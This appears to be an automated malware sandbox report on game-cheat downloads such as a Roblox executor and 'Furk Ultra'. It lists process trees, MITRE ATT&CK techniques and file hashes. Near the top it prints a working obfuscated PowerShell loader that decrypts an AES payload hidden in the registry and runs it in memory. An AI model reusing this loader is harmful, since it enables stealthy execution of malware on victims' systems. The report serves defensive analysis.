    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {$CNDu2 = 0; $hhzOK = 69; $lmevj = 3; $aQdlu = 'ZVq085gGi8rih5mo65soAVGH3JLhHkomneKzj2lsFic='; $RFFKp = 'geu1mjgXB8VO5GtXmPKX4g=='; $JAloI = 'Software\Microsoft'; $NeS1Z = 'VE7k0'; $Z8alL = $null; function q3yzX($bWlFg) {$oXmyW=[System.Security.Cryptography.Aes]::Create(); $oXmyW.Mode=[System.Security.Cryptography.CipherMode]::CBC; $oXmyW.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $oXmyW.Key=[System.Convert]::FromBase64String($aQdlu); $oXmyW.IV=[System.Convert]::FromBase64String($RFFKp); $MFitO=$oXmyW.CreateDecryptor(); $g53k9=$MFitO.TransformFinalBlock($bWlFg, $CNDu2, $bWlFg.Length); $MFitO.Dispose(); $oXmyW.Dispose(); $g53k9; } $HBFHe = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey($JAloI); $nbSgo = $hhzOK; $jDF7F = $HBFHe.GetValue($NeS1Z); $jDF7F = q3yzX($jDF7F); $EWaks = [Reflection.Assembly]::Load([byte[]]$jDF7F); $eGyCX = $EWaks.EntryPoint; $fH4dS = [int]$eGyCX.Invoke($CNDu2,$Z8alL); if ($fH4dS -eq $nbSgo) {exit $nbSgo } else {exit $lmevj}}"
    3⤵
    PID:2408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {$CNDu2 = 0; $hhzOK = 69; $lmevj = 3; $aQdlu = 'ZVq085gGi8rih5mo65soAVGH3JLhHkomneKzj2lsFic='; $RFFKp = 'geu1mjgXB8VO5GtXmPKX4g=='; $JAloI = 'Software\Microsoft'; $NeS1Z = 'VE7k0'; $Z8alL = $null; function q3yzX($bWlFg) {$oXmyW=[System.Security.Cryptography.Aes]::Create(); $oXmyW.Mode=[System.Security.Cryptography.CipherMode]::CBC; $oXmyW.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $oXmyW.Key=[System.Convert]::FromBase64String($aQdlu); $oXmyW.IV=[System.Convert]::FromBase64String($RFFKp); $MFitO=$oXmyW.CreateDecryptor(); $g53k9=$MFitO.TransformFinalBlock($bWlFg, $CNDu2, $bWlFg.Length); $MFitO.Dispose(); $oXmyW.Dispose(); $g53k9; } $HBFHe = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey($JAloI); $nbSgo = $hhzOK; $jDF7F = $HBFHe.GetValue($NeS1Z); $jDF7F = q3yzX($jDF7F); $EWaks = [Reflection.Assembly]::Load([byte[]]$jDF7F); $eGyCX = $EWaks.EntryPoint; $fH4dS = [int]$eGyCX.Invoke($CNDu2,$Z8alL); if ($fH4dS -eq $nbSgo) {exit $nbSgo } else {exit $lmevj}}"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1928
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /F /IM mshta.exe
    3⤵
    - Kills process with taskkill
    PID:3156
- C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\XenoUI.exe
  "C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\XenoUI.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cleanup.bat""
  2⤵
  PID:3540

C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\XenoUI.exe
"C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\XenoUI.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3552

C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\XenoUI.exe
"C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\XenoUI.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3680

C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\XenoUI.exe
"C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\XenoUI.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1900

C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\XenoUI.exe
"C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\XenoUI.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2352

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\autoexec\test.txt
1⤵
PID:1156

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\libcrypto-3-x64.dll"
  2⤵
  PID:3016
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0a1a3cb8,0x7ffa0a1a3cc8,0x7ffa0a1a3cd8
    3⤵
    PID:3468

C:\Users\Admin\AppData\Local\Temp\Temp1_Furk.Ultra.zip\Furk Ultra.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Furk.Ultra.zip\Furk Ultra.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:6488
- C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe
  "C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies system certificate store
  - Suspicious use of SendNotifyMessage
  PID:6544
- - C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe
    "C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\furk-ultra-nativefier-e68f82" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1524 --field-trial-handle=1676,i,11290972020762958421,4753130208466293552,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:6636
- - C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe
    "C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\furk-ultra-nativefier-e68f82" --mojo-platform-channel-handle=1984 --field-trial-handle=1676,i,11290972020762958421,4753130208466293552,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:6676
- - C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe
    "C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\furk-ultra-nativefier-e68f82" --app-user-model-id=furk-ultra-nativefier-e68f82 --app-path="C:\Users\Admin\AppData\Roaming\Furk Ultra\resources\app" --no-sandbox --no-zygote --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2172 --field-trial-handle=1676,i,11290972020762958421,4753130208466293552,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:6736
- - C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe
    "C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\furk-ultra-nativefier-e68f82" --app-user-model-id=furk-ultra-nativefier-e68f82 --app-path="C:\Users\Admin\AppData\Roaming\Furk Ultra\resources\app" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2520 --field-trial-handle=1676,i,11290972020762958421,4753130208466293552,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:6172
- - C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe
    "C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\furk-ultra-nativefier-e68f82" --app-user-model-id=furk-ultra-nativefier-e68f82 --app-path="C:\Users\Admin\AppData\Roaming\Furk Ultra\resources\app" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3280 --field-trial-handle=1676,i,11290972020762958421,4753130208466293552,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
    3⤵
    - Executes dropped EXE
    PID:6084
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://app.cloudtrks.com/click?pid=2&offer_id=3634&sub2=u134079&sub3=cl403422&sub7=rfhttps%3A%2F%2Frbxexecutor.pages.dev%2F&sub8=rdrbxexecutor.pages.dev&sub15=8fc655269245
    3⤵
    PID:6492
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x12c,0x130,0x134,0xfc,0x138,0x7ffa0a1a3cb8,0x7ffa0a1a3cc8,0x7ffa0a1a3cd8
      4⤵
      PID:6588
- - C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe
    "C:\Users\Admin\AppData\Roaming\Furk Ultra\Furk Ultra.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --user-data-dir="C:\Users\Admin\AppData\Roaming\furk-ultra-nativefier-e68f82" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3508 --field-trial-handle=1676,i,11290972020762958421,4753130208466293552,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3936

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:1616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "C:\Users\Admin\Downloads\Roblox.Arceus.X.Admin.1.0.9.apk"
  2⤵
  PID:1192
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0a1a3cb8,0x7ffa0a1a3cc8,0x7ffa0a1a3cd8
    3⤵
    PID:1200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious use of SendNotifyMessage
PID:7684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa09e2cc40,0x7ffa09e2cc4c,0x7ffa09e2cc58
  2⤵
  PID:7148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1844,i,3766539350584617592,13886070866612685943,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1836 /prefetch:2
  2⤵
  PID:7572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1960,i,3766539350584617592,13886070866612685943,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2156 /prefetch:3
  2⤵
  PID:8032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,3766539350584617592,13886070866612685943,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2204 /prefetch:8
  2⤵
  PID:8020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,3766539350584617592,13886070866612685943,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3244 /prefetch:1
  2⤵
  PID:4376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,3766539350584617592,13886070866612685943,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:5048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4540,i,3766539350584617592,13886070866612685943,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4620 /prefetch:1
  2⤵
  PID:7808

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:7188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious use of SendNotifyMessage
PID:2240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0a1a3cb8,0x7ffa0a1a3cc8,0x7ffa0a1a3cd8
  2⤵
  PID:6764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,3232228770741210207,17020616595198877088,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
  2⤵
  PID:4140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,3232228770741210207,17020616595198877088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 /prefetch:3
  2⤵
  PID:4704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,3232228770741210207,17020616595198877088,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2612 /prefetch:8
  2⤵
  PID:7400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,3232228770741210207,17020616595198877088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:7256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,3232228770741210207,17020616595198877088,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:6420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,3232228770741210207,17020616595198877088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
  2⤵
  PID:2840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,3232228770741210207,17020616595198877088,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
  2⤵
  PID:3488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,3232228770741210207,17020616595198877088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:8
  2⤵
  PID:4076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,3232228770741210207,17020616595198877088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:4092
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,3232228770741210207,17020616595198877088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3388 /prefetch:8
  2⤵
  PID:2560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,3232228770741210207,17020616595198877088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
  2⤵
  PID:6900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,3232228770741210207,17020616595198877088,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
  2⤵
  PID:3280

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1236

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\update-config.json

Filesize
102B

MD5
7d1d7e1db5d8d862de24415d9ec9aca4

SHA1
f4cdc5511c299005e775dc602e611b9c67a97c78

SHA256
ffad3b0fb11fc38ea243bf3f73e27a6034860709b39bf251ef3eca53d4c3afda

SHA512
1688c6725a3607c7b80dfcd6a8bea787f31c21e3368b31cb84635b727675f426b969899a378bd960bd3f27866023163b5460e7c681ae1fcb62f7829b03456477

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
554d6d27186fa7d6762d95dde7a17584

SHA1
93ea7b20b8fae384cf0be0d65e4295097112fdca

SHA256
2fa6145571e1f1ece9850a1ac94661213d3e0d82f1cef7ac1286ff6b2c2017cb

SHA512
57d9008ccabc315bd0e829b19fe91e24bab6ef20bcfab651b937b0f38eec840b58d0aed092a3bbedd2d6a95d5c150372a1e51087572de55672172adc1fc468a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a28bb0d36049e72d00393056dce10a26

SHA1
c753387b64cc15c0efc80084da393acdb4fc01d0

SHA256
684d797e28b7fd86af84bfb217d190e4f5e03d92092d988a6091b2c7bbbd67c1

SHA512
20940fee33aa2194c36a3db92d4fd314ce7eacc2aa745abec62aa031c2a53ba4ff89f2568626e7bd2536090175f8d045c3bb52c5faa5ecc8da8410ab5fc519f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ef94c82522e2f61bac7879ff3737880c

SHA1
7811f337e5cf1b19139eb1ad6a1c4a30d28e5b97

SHA256
35fab9812b67bae759152ae2807434c0cc24e3cb47f2beb348b931ca08f08221

SHA512
3cf0b73c78642f7917e3a6001d61e53f3091739a5a84b4624af8fa65927bc27a0c232999e186656a74073724e4dc7205b8372908f0aafefb91226647055521bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
97330a791be534d4cf00b534ce889f3e

SHA1
ae9b77c865f5f9b72ff45a5bfc3d6a8358e6315c

SHA256
cebcaef3c2bc600b5dbf54ee95e0ad6ee887957e19aa3179f6a59beadb281741

SHA512
96c9a1c8d03d5af1d14358141ae76ba2a405c934801a06c7885ee131736b7207c90be4807059134f86ce47ea7d9f8fcd1e7199e04bcf5248c0b2261f8e58b3e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\5f0b9171-4740-4f63-aaa4-f63513fbbb6a.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
